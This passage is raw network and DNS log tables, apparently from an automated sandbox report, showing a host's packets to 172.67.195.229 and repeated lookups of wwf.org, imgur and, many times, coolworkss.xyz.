                                                                                                                                                    Sep 5, 2023 13:03:11.401688099 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.401753902 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.401776075 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.402007103 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.402033091 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.402051926 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.402077913 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.402102947 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.402122974 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.402143002 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.402221918 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.402285099 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.402367115 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.402393103 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.402421951 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.402446985 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.402470112 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.402678013 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.402698040 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.402718067 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.402738094 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.402806997 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.402878046 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.402899027 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.402962923 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.403110981 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.403132915 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.403202057 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.403225899 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.403331995 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.403353930 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.403414011 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.403466940 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.403491974 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.403512001 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.403579950 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.403707981 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.403728008 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.403753996 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.403774977 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.403795004 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.403980970 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.404000998 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.404077053 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.404217005 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.404237986 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.404345989 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.404418945 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.404499054 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.404603958 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.404707909 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.404881001 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.405008078 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.405031919 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.405154943 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.405282021 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.405400038 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.405579090 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.405656099 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.405818939 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.405905008 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.406063080 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.406136990 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.406245947 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.406312943 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.406333923 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.406450987 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.406496048 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.406516075 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.406579018 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.406687021 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.406755924 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.430551052 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.430625916 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.430663109 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.430695057 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.430808067 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.430846930 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.430881023 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.430977106 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.521076918 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.521131992 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.521203995 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.521689892 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.521725893 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.521867037 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.522094965 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.522366047 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.522432089 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.522509098 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.522713900 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.522809029 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.523036003 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.523252964 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.523289919 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.523336887 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.523382902 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.524785042 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.524899006 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.525105953 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.525154114 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.525187016 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.525221109 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:12.624473095 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:12.624550104 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:12.624773979 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:12.630727053 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:18.343882084 CEST4973880192.168.2.4172.67.195.229
                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Sep 5, 2023 13:01:19.539535999 CEST4981753192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:01:19.708534002 CEST53498178.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:20.793716908 CEST6255053192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:01:20.946214914 CEST53625508.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.859819889 CEST5330053192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:01:22.002590895 CEST53533008.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:22.756494045 CEST6419653192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:22.913639069 CEST53641968.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:23.579417944 CEST5486353192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:23.745657921 CEST53548638.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:24.349047899 CEST5539853192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:24.491278887 CEST53553988.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:25.070193052 CEST5443253192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:25.223656893 CEST53544328.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:25.709424973 CEST4998553192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:25.865490913 CEST53499858.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:26.454027891 CEST5127353192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:26.621381998 CEST53512738.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:27.174302101 CEST6133053192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:27.329173088 CEST53613308.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:27.898886919 CEST6092653192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:28.068356037 CEST53609268.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:28.641485929 CEST5930053192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:28.782212019 CEST53593008.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:29.382674932 CEST4924753192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:29.522876024 CEST53492478.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:30.149316072 CEST5561853192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:30.303704023 CEST53556188.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:31.558554888 CEST5428953192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:31.698564053 CEST53542898.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:34.552989960 CEST5235953192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:34.695635080 CEST53523598.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:35.482000113 CEST4966853192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:35.622256041 CEST53496688.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:36.214195013 CEST5886753192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:36.358743906 CEST53588678.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:37.509181976 CEST5261853192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:37.649600029 CEST53526188.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:38.230442047 CEST6366553192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:38.370668888 CEST53636658.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:38.928719997 CEST5845553192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:39.096272945 CEST53584558.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:39.649209023 CEST5709653192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:39.789850950 CEST53570968.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:40.375665903 CEST6213553192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:40.516215086 CEST53621358.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:41.022234917 CEST5487353192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:41.165035009 CEST53548738.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:41.684566975 CEST5631353192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:41.837364912 CEST53563138.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:42.458120108 CEST5566053192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:42.603630066 CEST53556608.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:43.275983095 CEST5850853192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:43.416393042 CEST53585088.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:44.036360979 CEST4970253192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:44.179506063 CEST53497028.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:44.916050911 CEST6304453192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:45.060606956 CEST53630448.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:45.691601992 CEST6458853192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:45.832770109 CEST53645888.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:46.437236071 CEST6349453192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:46.580255032 CEST53634948.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:47.163491011 CEST5790253192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:02:47.306771040 CEST53579028.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:03.129585028 CEST6103853192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:03:03.270160913 CEST53610388.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:03.870151997 CEST6196053192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:03:04.000036001 CEST53619608.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:04.715390921 CEST5301453192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:03:04.855694056 CEST53530148.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:05.408701897 CEST5495653192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:03:05.550044060 CEST53549568.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:06.458864927 CEST6470153192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:03:06.600178003 CEST53647018.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:08.287476063 CEST5767653192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:03:08.428569078 CEST53576768.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:08.980694056 CEST6449653192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:03:09.125320911 CEST53644968.8.8.8192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:10.337860107 CEST4972753192.168.2.48.8.8.8
                                                                                                                                                    Sep 5, 2023 13:03:10.478565931 CEST53497278.8.8.8192.168.2.4
                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                    Sep 5, 2023 13:01:19.539535999 CEST192.168.2.48.8.8.80xf343Standard query (0)wwf.orgA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:01:20.793716908 CEST192.168.2.48.8.8.80xc55bStandard query (0)www.worldwildlife.orgA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:01:21.859819889 CEST192.168.2.48.8.8.80x5e6Standard query (0)i.imgur.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:22.756494045 CEST192.168.2.48.8.8.80x74fStandard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:23.579417944 CEST192.168.2.48.8.8.80xa055Standard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:24.349047899 CEST192.168.2.48.8.8.80x7471Standard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:25.070193052 CEST192.168.2.48.8.8.80xa6e1Standard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:25.709424973 CEST192.168.2.48.8.8.80xa580Standard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:26.454027891 CEST192.168.2.48.8.8.80x3441Standard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:27.174302101 CEST192.168.2.48.8.8.80x8278Standard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:27.898886919 CEST192.168.2.48.8.8.80x43fbStandard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:28.641485929 CEST192.168.2.48.8.8.80x828cStandard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:29.382674932 CEST192.168.2.48.8.8.80xd7a5Standard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:30.149316072 CEST192.168.2.48.8.8.80xf13dStandard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:31.558554888 CEST192.168.2.48.8.8.80xfbfdStandard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:34.552989960 CEST192.168.2.48.8.8.80xf87Standard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:35.482000113 CEST192.168.2.48.8.8.80x283fStandard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:36.214195013 CEST192.168.2.48.8.8.80x631bStandard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:37.509181976 CEST192.168.2.48.8.8.80xbfccStandard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:38.230442047 CEST192.168.2.48.8.8.80x9338Standard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:38.928719997 CEST192.168.2.48.8.8.80xb151Standard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:39.649209023 CEST192.168.2.48.8.8.80x2f06Standard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:40.375665903 CEST192.168.2.48.8.8.80x19f4Standard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:41.022234917 CEST192.168.2.48.8.8.80x961dStandard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:41.684566975 CEST192.168.2.48.8.8.80xe3f9Standard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:42.458120108 CEST192.168.2.48.8.8.80x990fStandard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:43.275983095 CEST192.168.2.48.8.8.80x5be2Standard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:44.036360979 CEST192.168.2.48.8.8.80x2644Standard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:44.916050911 CEST192.168.2.48.8.8.80x5c16Standard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:45.691601992 CEST192.168.2.48.8.8.80x9462Standard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:46.437236071 CEST192.168.2.48.8.8.80xcdbcStandard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:47.163491011 CEST192.168.2.48.8.8.80x386dStandard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:03:03.129585028 CEST192.168.2.48.8.8.80xcb86Standard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:03:03.870151997 CEST192.168.2.48.8.8.80x343aStandard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:03:04.715390921 CEST192.168.2.48.8.8.80x6336Standard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:03:05.408701897 CEST192.168.2.48.8.8.80x14a7Standard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:03:06.458864927 CEST192.168.2.48.8.8.80xec9dStandard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:03:08.287476063 CEST192.168.2.48.8.8.80x5e77Standard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:03:08.980694056 CEST192.168.2.48.8.8.80x4109Standard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:03:10.337860107 CEST192.168.2.48.8.8.80x429dStandard query (0)coolworkss.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                    Sep 5, 2023 13:01:19.708534002 CEST8.8.8.8192.168.2.40xf343No error (0)wwf.org104.18.6.142A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:01:19.708534002 CEST8.8.8.8192.168.2.40xf343No error (0)wwf.org104.18.7.142A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:01:20.946214914 CEST8.8.8.8192.168.2.40xc55bNo error (0)www.worldwildlife.org104.18.6.94A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:01:20.946214914 CEST8.8.8.8192.168.2.40xc55bNo error (0)www.worldwildlife.org104.18.7.94A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:01:22.002590895 CEST8.8.8.8192.168.2.40x5e6No error (0)i.imgur.comipv4.imgur.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:01:22.002590895 CEST8.8.8.8192.168.2.40x5e6No error (0)ipv4.imgur.map.fastly.net199.232.32.193A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:22.913639069 CEST8.8.8.8192.168.2.40x74fNo error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:22.913639069 CEST8.8.8.8192.168.2.40x74fNo error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:23.745657921 CEST8.8.8.8192.168.2.40xa055No error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:23.745657921 CEST8.8.8.8192.168.2.40xa055No error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:24.491278887 CEST8.8.8.8192.168.2.40x7471No error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:24.491278887 CEST8.8.8.8192.168.2.40x7471No error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:25.223656893 CEST8.8.8.8192.168.2.40xa6e1No error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:25.223656893 CEST8.8.8.8192.168.2.40xa6e1No error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:25.865490913 CEST8.8.8.8192.168.2.40xa580No error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:25.865490913 CEST8.8.8.8192.168.2.40xa580No error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:26.621381998 CEST8.8.8.8192.168.2.40x3441No error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:26.621381998 CEST8.8.8.8192.168.2.40x3441No error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:27.329173088 CEST8.8.8.8192.168.2.40x8278No error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:27.329173088 CEST8.8.8.8192.168.2.40x8278No error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:28.068356037 CEST8.8.8.8192.168.2.40x43fbNo error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:28.068356037 CEST8.8.8.8192.168.2.40x43fbNo error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:28.782212019 CEST8.8.8.8192.168.2.40x828cNo error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
